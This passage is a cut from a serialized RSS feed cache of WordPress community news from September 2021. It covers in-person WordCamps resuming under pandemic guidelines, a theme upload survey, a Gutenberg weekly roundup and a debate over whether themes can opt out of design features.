\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: WordPress Opens Applications for In-Person WordCamps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122537\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:169:\"https://wptavern.com/wordpress-opens-applications-for-in-person-wordcamps?utm_source=rss&utm_medium=rss&utm_campaign=wordpress-opens-applications-for-in-person-wordcamps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7096:\"<img /><p>photo credit: <a href=\"http://www.flickr.com/photos/huasonic/3008912290/\">Huasonic</a> &ndash; <a href=\"http://creativecommons.org/licenses/by-nc/2.0/\">cc</a></p>\n\" data-medium-file=\"https://wptavern.com/wp-content/uploads/2021/09/3008912290_e223135aaf_k-1-300x199.jpg\" data-large-file=\"https://wptavern.com/wp-content/uploads/2021/09/3008912290_e223135aaf_k-1-500x332.jpg\" loading=\"lazy\" width=\"2047\" height=\"1361\" src=\"https://wptavern.com/wp-content/uploads/2021/09/3008912290_e223135aaf_k-1.jpg\" alt=\"WordCamp Swag\" class=\"wp-image-122755\" srcset=\"https://wptavern.com/wp-content/uploads/2021/09/3008912290_e223135aaf_k-1.jpg 2047w, https://wptavern.com/wp-content/uploads/2021/09/3008912290_e223135aaf_k-1-300x199.jpg 300w, https://wptavern.com/wp-content/uploads/2021/09/3008912290_e223135aaf_k-1-500x332.jpg 500w, https://wptavern.com/wp-content/uploads/2021/09/3008912290_e223135aaf_k-1-768x511.jpg 768w, https://wptavern.com/wp-content/uploads/2021/09/3008912290_e223135aaf_k-1-1536x1021.jpg 1536w\" sizes=\"(max-width: 2047px) 100vw, 2047px\" />photo credit: <a href=\"http://www.flickr.com/photos/huasonic/3008912290/\">Huasonic</a> &ndash; <a href=\"http://creativecommons.org/licenses/by-nc/2.0/\">cc</a>\n\n\n\n<p>WordPress is <a href=\"https://make.wordpress.org/community/2021/09/13/announcement-updated-guidelines-for-in-person-wordcamps/\">restarting its in-person WordCamp program</a> after more than six weeks of discussion on a <a href=\"https://make.wordpress.org/community/2021/07/27/proposal-how-to-return-to-safe-in-person-wordcamps/\">proposal</a> for how the WordPress community can return to hosting events. Applications are now open for in-person WordCamps, provided they meet the Community Team&rsquo;s updated guidelines for organizing WordCamps during the pandemic.</p>\n\n\n\n<p>Local communities that have hosted meetups prior to the pandemic are eligible to apply to host a WordCamp if public health authorities permit in-person gatherings in their region and the area passes the <a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/2021-returning-to-in-person-meetups/in-person-meetup-decision-checklist/\">in-person safety checklist</a>. If the checklist requirements cannot be met, organizers may still host a WordCamp, provided that vaccines or COVID tests are readily available in the community. In the event the location doesn&rsquo;t pass the in-person checklist and also has limited access to vaccines and testing, organizers would need to opt for an online WordCamp.</p>\n\n\n\n<p>The new guidelines have been simplified into a flowchart:</p>\n\n\n\n<div class=\"wp-block-image\"><img /></div>\n\n\n\n<p>The Community Team expects that attendees will be fully vaccinated, recently tested negative, or recovered from COVID within the last three months. Attendance will be based on the honor system, as organizers will not be asking for proof as a condition of participation. </p>\n\n\n\n<p>WordCamps are sorely missed by WordPress enthusiasts and professionals, and many are eager to return. This restart of the WordCamp program will need to attract more than just attendees &ndash; WordCamp organizers will need to get on board to be the first to test the waters. </p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Yep, the camps are where the community spirit is both sparked and inspired, and often times repaired. We need in real life Wordcamps</p>&mdash; Paul Lacey (@wp_paullacey) <a href=\"https://twitter.com/wp_paullacey/status/1437518452927905800?ref_src=twsrc%5Etfw\">September 13, 2021</a></blockquote>\n</div>\n\n\n\n<p>The fact that vaccinated individuals can still transmit the virus throws a wrench into things in areas where vaccine hesitancy runs high, making the entire population more susceptible to breakthrough infections. This combined with the prevalence of the more highly contagious Delta variant makes for a scenario where attendees at approved in-person WordCamps could unwittingly participate in spreading the virus to others. </p>\n\n\n\n<p>When asked about requiring masks or other precautions, Community Team representative Angela Jin said organizers have a better opportunity to require more precautions beyond local guidelines if they work with a venue that has its own requirements.</p>\n\n\n\n<p>&ldquo;The Community team is asking organizers and attendees to follow local guidelines,&rdquo; Jin said. &ldquo;If organizers would like to have more precautions, the deputies would advocate for booking at a venue that takes those precautions, for example, a venue that requires masks while indoors. In this way, the ask of ensuring additional safety measures is not just on organizers (event organizers already have enough to keep an eye on!), but on venue staff as well.&rdquo;</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Anybody else ready for IRL WordCamps? <a href=\"https://twitter.com/hashtag/WordPress?src=hash&ref_src=twsrc%5Etfw\">#WordPress</a> <a href=\"https://twitter.com/hashtag/genesiswp?src=hash&ref_src=twsrc%5Etfw\">#genesiswp</a> <a href=\"https://t.co/xg2JmSUa3X\">pic.twitter.com/xg2JmSUa3X</a></p>&mdash; David Vogelpohl (@wpdavidv) <a href=\"https://twitter.com/wpdavidv/status/1403110409247281152?ref_src=twsrc%5Etfw\">June 10, 2021</a></blockquote>\n</div>\n\n\n\n<p>&ldquo;I&rsquo;ve been asked if I think there will be an in-person WordCamp Miami in 2022 once it&rsquo;s allowed,&rdquo; longtime WordCamp organizer David Bisset <a href=\"https://twitter.com/dimensionmedia/status/1437465815842967555\">said</a>. &ldquo;No idea. But I doubt I&rsquo;ll be involved unless the state of Florida changes dramatically. Plus, other reasons. As of now I&rsquo;m not planning on attending any in-person WCs for quite some time. I have a &lsquo;wait and see&rsquo; attitude.\'&rdquo;</p>\n\n\n\n<p>One important consideration is that the Global Sponsorship Program does not currently include funding for WordCamps, so organizers will need to raise 100% of the expenses for their events. A group of Community Team deputies are working on a proposal for the <a href=\"https://make.wordpress.org/community/2021/09/10/2022-global-sponsorship-working-group/\">2022 Global Sponsorship Program</a>, aiming to finalize it by the end of October. In the meantime, organizers will need to find a way to foot the bill.</p>\n\n\n\n<p>As scientists consider the increasingly more likely possibility that SARS-CoV-2 becomes an endemic virus, WordCamps and other gatherings will need to find the right combination of precautions that will enable them to continue in this new era. The Community team has become skilled at hosting virtual events, but 18 months into this pandemic it is clear that the connections fostered at WordCamps are irreplaceable.</p>\n\n\n\n<p>&ldquo;The deputies and I know that many places around the world are not in a position to organize in-person WordCamps at this time,&rdquo; Jin said. &ldquo;The team will continue to support online events, and do not expect organizers to host in-person events if they are not ready to.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 14 Sep 2021 03:35:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"WPTavern: Theme Author Survey Results: Uploading via ZIP Files Preferred, SVN Access Forthcoming\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122704\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:233:\"https://wptavern.com/theme-author-survey-results-uploading-via-zip-files-preferred-svn-access-forthcoming?utm_source=rss&utm_medium=rss&utm_campaign=theme-author-survey-results-uploading-via-zip-files-preferred-svn-access-forthcoming\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3904:\"<p class=\"has-drop-cap\">Earlier today, Dion Hulse announced the <a href=\"https://make.wordpress.org/themes/2021/09/13/theme-upload-survey-results-next-steps/\">results of a six-week survey</a> on the WordPress.org theme upload process. The goal was to figure out if uploading a ZIP file was a &ldquo;pain point&rdquo; and see what other methods theme authors prefer. Then, move forward based on the feedback. In total, 256 people responded to the survey.</p>\n\n\n\n<p>Of the weighted results, uploading themes via a ZIP remained the most popular option. Committing via Git or integrating with GitHub came in second and third, respectively. Using SVN or a CLI tool also had support.</p>\n\n\n\n<p>The next steps should include allowing theme updates to be submitted via SVN. Trac tickets will also be removed for updates, which the Themes Team no longer reviews. For theme authors who prefer Git, the plan is to encourage the use of a GitHub Action for automatic deployment over SVN.</p>\n\n\n\n<p>There are no tickets for implementing the changes yet, but they are forthcoming. Hulse said he is awaiting any feedback on the announcement post or in the Themes Team September 14 meeting.</p>\n\n\n\n<p>Nothing was said about the initial theme submission. This will likely remain the same.</p>\n\n\n\n<p>The upcoming SVN access will have some limits in comparison to plugins. Updates will be stored via a strict <code>/theme-slug/version</code> scheme with a standardized version format. Theme authors will not be allowed to change any commits once an update is submitted. Like the ZIP upload system, they will need to bump the version number to send a new update. The goal is for the theme repository to merely be a deployment destination and not a place for development.</p>\n\n\n\n<p>This should be a welcome change for those who have longed for alternative theme upload methods. As far back as I can remember, theme authors have asked for SVN access to the WordPress.org theme directory. It is a capability that plugin developers have long had. This was before the proliferation of Git and the rising popularity of GitHub. Every so often, themers would begin the discussion anew, but it would always end the same. Uploading a ZIP file was the only way to submit a new theme or an update to an existing one.</p>\n\n\n\n<p>Eventually, those discussions included talk of Git. However, it seemed most of the passion for integrating with any version control system (VCS) had waned. Most just lived with the status quo.</p>\n\n\n\n<p>This has not necessarily been a bad thing. Uploading a ZIP has kept the process simple. Theme authors could use their preferred VCS (or none) and ship the final product to WordPress.org.</p>\n\n\n\n<p>As I viewed the survey and thought it over, I changed positions. Throughout my history as a theme author, I was clearly in the camp calling for VCS integration. I wanted SVN (eventually, GIT) access to my projects in the directory. However, I had long ago customized my development build process to incorporate a ZIP creation step. The extra 30 seconds or so that it took to upload that file via the theme upload form did not seem to matter so much anymore.</p>\n\n\n\n<p>Like the plurality of others who responded to the survey, I now prefer uploading a ZIP file. Maybe it is what I am accustomed to, but it would not have been my answer a few years ago. I have come to appreciate the simplicity of the existing system.</p>\n\n\n\n<p>However, opening the theme upload process up to other methods should improve things for more people. In particular, I could imagine theme shops incorporating something similar to <a href=\"https://wptavern.com/10up-releases-github-actions-for-simplifying-wordpress-plugin-deployment\">10up&rsquo;s GitHub Action</a> for plugin deployment in their release process. Essentially, the Action automatically sends an update to WordPress.org&rsquo;s SVN repository when tagging a release.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 13 Sep 2021 22:56:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"Gutenberg Times: Theme Switching, Global Styles, Blocks in REST API and more – Weekend Edition #184\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=18948\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://gutenbergtimes.com/theme-switching-weekend-edition-184/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:13344:\"<p>Howdy, howdy! </p>\n\n\n\n<p>Today we have a great mixture of links to tutorials, news, general information, call to action and events. Now that the summer is over, it feels there is another wave of WordPressers are starting to adopt the block editor, block-based themes and to pay more attention to what&#8217;s happening in the Gutenberg world. Or is it just me diving into the topics full-time? </p>\n\n\n\n\n\n<p>Before you get distracted by the headlines below, let me ask you: Do you have your WordCamp US Tickets, already? <a href=\"https://us.wordcamp.org/2021/tickets/\"><strong>Now is the time! </strong></a></p>\n\n\n\n<p><strong><a href=\"https://us.wordcamp.org/2021\">WordCamp US</a></strong> will take place as a one-day virtual event on October 1st, 2021.  It&#8217;s free and takes place on a Friday, so it won&#8217;t cut into your screen-free weekend activities.</p>\n\n\n\n<ul><li>The <a href=\"https://us.wordcamp.org/2021/wcus-speakers-first-group/\">first</a> and <a href=\"https://us.wordcamp.org/2021/wcus-speakers-second-group/\">second</a> set of brilliant speakers were announced this week.</li><li>There is still a <a href=\"https://us.wordcamp.org/2021/call-for-chat-directors/#more-2716\">Call for Directors</a> out and if you want to help with Live Chat moderation and capture audience questions you can apply until Sept. 16 for three shifts. <a href=\"https://us.wordcamp.org/2021/call-for-chat-directors/#more-2716\">More here.</a></li><li>Take the opportunity and meetup with a small group of local friends for a watch party. <strong>Don Soschin </strong>has some ideas and tips for you. <a href=\"https://us.wordcamp.org/2021/create-your-wcus21-attendee-pod/\">Create your WCUS 2021 Attendee Pod.</a></li></ul>\n\n\n\n<p>See y&#8217;all at WCUS! </p>\n\n\n\n<p>Yours, <br />Birgit ?</p>\n\n\n\n<h2>Full-Site Editing and Theme design</h2>\n\n\n\n<p>Speaking of events, next week <strong>Anne McCarthy, Marcus Kazmierczak and Dave Smith </strong>will gather for a <a href=\"https://make.wordpress.org/test/2021/09/09/hallway-hangout-on-adoption-pathways-for-full-site-editing/\"><strong>Hallway Hangout on September 16th at 11 am EDT / 16:00 UTC.</strong></a> They will  discuss adoption pathways to full site editing, what’s working, what successes folks have had, what blockers people are running into, and what might help more folks participate. Beyond just the benefits of learning from each other, this information will ideally be used to help influence future resources and to give insights to the teams working on these items. Join the <a href=\"https://wordpress.slack.com/archives/C015GUFFC00\">#fse-outreach-program</a> WP Slack channel for updates.</p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>The next feedback round for participants in the FSE outreach program is a <strong><a href=\"https://make.wordpress.org/test/2021/09/08/fse-program-exploration-help-with-the-future-of-block-theme-switching/\">Theme Switching Exploration</a>.</strong> Imagine a world where one could seamlessly take product review patterns from one theme, styling from another, and product display templates from an eCommerce focused theme to create a store. Or imagine being able to switch themes while retaining your favorite palette of colors and typography. </p>\n\n\n\n<p>The focus of this exploration is more on “wishful thinking”. In the instructions, <strong>Anne McCarthy</strong> guides you through a very basic theme switching process, and then asks you to creatively think about what you’d like to see happen. In other words, the focus is not so much on finding bugs, and more on gathering useful insights that will help design this experience.&nbsp;</p>\n\n\n\n<p>If you need some additional inspiration on how your want to approach your switching journey, read <strong>Justin Tadlock</strong>&#8216;s Exploration Report on the WP Tavern: <a href=\"https://wptavern.com/fse-program-insights-into-switching-between-block-themes\"><strong>Insights Into Switching Between Block Themes</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n\n<p><strong><a href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Need a plugin .zip from Gutenberg&#8217;s main (trunk) branch?</a></strong><br />Gutenberg Times provides daily build for testing and review. <br />Have you been using it? Hit reply and let me know.</p>\n\n\n\n<p><img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/bph/gutenberg/total?style=for-the-badge\" /></p>\n\n\n\n\n<p><strong><a href=\"https://twitter.com/oandregal\">André Maneiro</a></strong> compares in his post <a href=\"https://oandre.gal/the-developer-experience-of-presets/\"><strong>The developer experience of WordPress presets</strong></a>  how to handle presets for WordPress themes before and after the release of WordPress 5.8, when theme.json was merged into core. It&#8217;s a practical recap on the advantages for developers to migrate to theme.json even for classic themes. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>In <a href=\"https://github.com/WordPress/gutenberg/issues/34574\"><strong>The Global Styles Interface</strong></a> issue on GitHub,  <strong>Matias Ventura</strong> covers the broad design aspects of global styles, the upcoming user interface for <code>theme.json</code>. Ventura discusses the iconography, small previews, the handling of color palettes, elements and filters, and color tools. Take a look and chime in on working on TNBT (The next Big Thing) </p>\n\n\n\n<p><strong><a href=\"https://twitter.com/shaunandrews\">Shaun Andrews,</a></strong> on the design team, shared in <a href=\"https://shaunandrews.com/2021/09/the-wordpress-editor-document-status-and-visibility/\"><strong>The WordPress Editor: Document Status and Visibility</strong></a> the next-generation designs for the Gutenberg Publish section in the side bar. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>A group of theme developers met at this week&#8217;s <a href=\"https://make.wordpress.org/test/2021/09/10/hallway-hangout-discussion-on-full-site-editing-issues-prs-designs-10-september/\"><strong>Hallway Hangout to discuss current Full-site editing issues, pull requests and designs</strong>. </a> Anne McCarthy posted the recording and a summary on the Make Blog. </p>\n\n\n\n\n<p><strong><a href=\"https://gutenbergtimes.com/podcast/changelog-51-new-gallery-block-theme-json/\">Gutenberg Changelog #51</a></strong> is now available with transcript.  </p>\n\n\n\n<p><strong>Subscribe to the <a href=\"https://gutenbergtimes.com/podcast/\">Gutenberg Changelog</a> podcast </strong><br />?️ <a href=\"https://open.spotify.com/show/620NwVKQJGdTupy36zYxvg?mc_cid=4b6c9f88fe\">Spotify</a> | <a href=\"https://podcasts.google.com/feed/aHR0cHM6Ly9ndXRlbmJlcmd0aW1lcy5jb20vZmVlZC9wb2RjYXN0\">Google</a> | <a href=\"https://podcasts.apple.com/us/podcast/gutenberg-changelog/id1469294475\">iTunes</a> | <a href=\"https://pca.st/podcast/f8445ec0-7508-0137-f267-1d245fc5f9cf\">PocketCasts</a> | <a href=\"https://www.stitcher.com/show/gutenberg-changelog\">Stitcher</a> |<br />?️ <a href=\"https://www.podbean.com/podcast-detail/chi7j-9904a/Gutenberg-Changelog-Podcast\">Pod Bean</a> | <a href=\"https://castbox.fm/channel/Gutenberg-Changelog-id2173375\">CastBox</a> | <a href=\"https://www.podchaser.com/podcasts/gutenberg-changelog-878239/\">Podchaser</a> | <a href=\"https://gutenbergtimes.com/feed/podcast\">RSS Feed</a> </p>\n\n\n\n<img />\n\n\n\n\n<h2>Gutenberg for Site implementers and Content creators</h2>\n\n\n\n<p>In her post <a href=\"https://make.wordpress.org/core/2021/09/09/core-editor-improvement-cascading-impact-of-improvements-to-featured-images/\"><strong>Cascading impact of improvements to featured images</strong></a> <strong>Anne McCarty </strong>shows you how improvements to the&nbsp;Featured Image&nbsp;block&nbsp;lead to more possibilities for content creation with short videos. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>Not in and of itself block-editorial, but still a great story: <a href=\"https://wptavern.com/automattic-acquires-social-image-generator-plugin-plans-to-integrate-with-jetpack\"><strong>Automattic Acquires Social Image Generator Plugin, Plans to Integrate with Jetpack</strong></a>. <strong><a href=\"https://twitter.com/danielpost\">Daniel Post</a></strong>&#8216;s plugin was a dream come true for social marketing people and save so much time. Post and the plugin have a sustainable home with Automattic now.</p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>The team working on the <a href=\"https://pods.io/2021/02/11/pods-2-8-beta-1-released-and-the-field-guide-to-pods-2-8/\"><strong>Pods Framework have published their Field Guide</strong></a> for the next version (2.8). Among many other new features and fixes, you&#8217;ll find the<strong> </strong>new Pods Blocks which allow you to </p>\n\n\n\n<ul><li>List Items, </li><li>show a Single Item, </li><li>display a Single Item Field, </li><li>show a Public Form, or </li><li>embed a View (any file) from your theme / child theme. </li></ul>\n\n\n\n<p>They also included compatibility with the new WordPress 5.8 Query Loop blocks!</p>\n\n\n\n<p>For those creators out there looking to get ahead with some common custom block needs, our new Pods Blocks API allows you to register your blocks. Congrats to <strong><a href=\"https://twitter.com/scottkclark\">Scott Kingsley Clark</a></strong> and his team for the major effort to add Gutenberg capabilities to the framework!</p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>The MetaBox team published an <a href=\"https://metabox.io/gutenberg-vs-page-builders-comparison/\"><strong>in-depth comparison between  Gutenberg vs. Page Builders &#8211; What is Better &amp; Faster?</strong></a>. Of course, this is still premature, as Gutenberg isn&#8217;t a full-featured page builder yet, and is missing quite a few customization and layout feature most page builder provide. This post also runs websites built with Gutenberg and Oxygen in a speed test comparison. </p>\n\n\n\n\n<p><strong>&nbsp;<a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/\" target=\"_blank\" rel=\"noreferrer noopener\">&#8220;Keeping up with Gutenberg &#8211; Index 2021&#8221;</a>&nbsp;</strong><br />A chronological list of the WordPress Make Blog posts from various teams involved in Gutenberg development: Design, Theme Review Team, Core Editor, Core JS, Core CSS, Test and Meta team from Jan. 2021 on. Updated by yours truly.  </p>\n\n\n\n\n<h2>Block Building for developers</h2>\n\n\n\n<p><strong><a href=\"https://twitter.com/thespacedmonkey\">Jonny Harris</a></strong>, WordPress contributor, sponsored by XWP, created a plugin, <strong><a href=\"https://github.com/spacedmonkey/wp-rest-blocks\">REST API blocks </a></strong>that adds block data in json format into the REST API. Once installed, there will be two new fields added to the rest api,&nbsp;<code>has_blocks</code>&nbsp;and&nbsp;<code>blocks</code>. Sounds pretty nifty. Thanks to David Bisset for tweeting about it. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong><a href=\"https://twitter.com/richard_tabor\">Rich Tabor</a> </strong>created a tutorial on how to create a <a href=\"https://richtabor.com/gutenberg-publishing-checklist/\"><strong>Publish Checklist for the block editor</strong>.</a> If you work in a team of writers, ensuring that various content tasks are completed before an article is published. Tabor how to use a template to display the check list for the editor. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>Matias Ventura shared this fabulous post by <strong><a href=\"https://twitter.com/dmsnell23\">Dennis Snell,</a></strong> code wrangler at Automattic. In <strong><a href=\"https://fluffyandflakey.blog/2017/09/04/gutenberg-posts-arent-html/\">Gutenberg posts aren’t HTML…</a> </strong>Snell explains the idea to store block information in HTML comments in <code>post_content</code>. It was an eye-opener for me. </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p><strong>Create and Display Math Formulas</strong> is an interesting requirement and mostly used by scientists and Math teachers. The developers Dennis Snell and Adam Silverstein have a block for this group of writers. </p>\n\n\n\n<ul><li><a href=\"https://wordpress.org/plugins/mathml-block/\"><strong>MathML</strong></a> by <strong>Adam Silverstein</strong> is available in the plugin repository and the Block Directory</li><li>In <a href=\"https://fluffyandflakey.blog/2019/09/09/typesetting-math-in-gutenberg/\"><strong>Typesetting Math in Gutenberg</strong></a> by <strong>Dennis Snell</strong> walks you through the genesis of his block. With this example block, Snell explains, &#8220;I try to design my blocks so that all of the processing and loading costs stay in the editor while editing the post&#8221;. </li></ul>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\n\n\n\n<p>For the seventh episode of the Jukebox podcast, <strong>Nathan Wrigley</strong> interviewed Gutenberg contributor <a href=\"https://wptavern.com/podcast/7-ajit-bohra-on-gutenberg-full-site-editing-and-react\"><strong>Ajit Bohra on Gutenberg, Full Site Editing and React</strong></a>. The two covered quite a bit of ground. Grab your favorite beverage and listen. </p>\n\n\n\n<p> </p>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 11 Sep 2021 08:29:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"WPTavern: Theme Authors Should Be Able To Opt Out of Any Design Feature\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=122619\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:187:\"https://wptavern.com/theme-authors-should-be-able-to-opt-out-of-any-design-feature?utm_source=rss&utm_medium=rss&utm_campaign=theme-authors-should-be-able-to-opt-out-of-any-design-feature\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5451:\"<p class=\"has-drop-cap\">As I debugged issues with the new block gap feature added in <a href=\"https://wptavern.com/gutenberg-11-4-overhauls-galleries-adds-axial-padding-for-buttons-and-lays-groundwork-for-global-spacing\">Gutenberg 11.4</a> last week, I found the <a href=\"https://github.com/WordPress/gutenberg/pull/33812\">ticket introducing it</a>. And, there was already a <a href=\"https://github.com/WordPress/gutenberg/issues/34441\">new ticket</a> for one problem I had hit. However, there was some discussion over whether themes should be allowed to opt-out, rolling their own solution. There was no way to do it at the time.</p>\n\n\n\n<p>It felt like a no-brainer, something I would not think twice about. I quickly <a href=\"https://github.com/WordPress/gutenberg/pull/33812#issuecomment-910377833\">chimed in</a>:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>Should theme authors be able to opt out? <em>If this is ever a question that comes up, the answer is always: Absolutely, 100%, yes!</em></p></blockquote>\n\n\n\n<p>The front end of a site is the theme author&rsquo;s domain. Ultimately, they define how things work there. At least, this is how it has always been. Before the advent of the block system, there were cases where WordPress added its own spin to front-end features, such as styles for the gallery shortcode and emoji JavaScript-image replacement. Themes have always had methods for disabling those.</p>\n\n\n\n<p>With the introduction of the Gutenberg project and its evolving feature set, WordPress continues stepping into front-end design. This carries the benefit of standardizing the relationship between the platform, themes, and users. It makes things like block patterns universal, and it will continue doing so as we get into more advanced layout tools. This is a future that I am eager to witness because it will make theming much easier.</p>\n\n\n\n<p>However, within the in-ticket discussion, I came across one of the fundamental rifts between some people working on Gutenberg and third-party developers:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>I disagree with this take. This means that everything should be optional in WordPress and goes against the decisions not options. some things need to be options but not everything&hellip;I don&rsquo;t think it should be a rule to have an opt-out for everything personally. For instance for structural styles, I&rsquo;d rather have the themes rely on Core always instead of reinventing their own. Themes are here to bring personality and design but not to define what &ldquo;horizontal 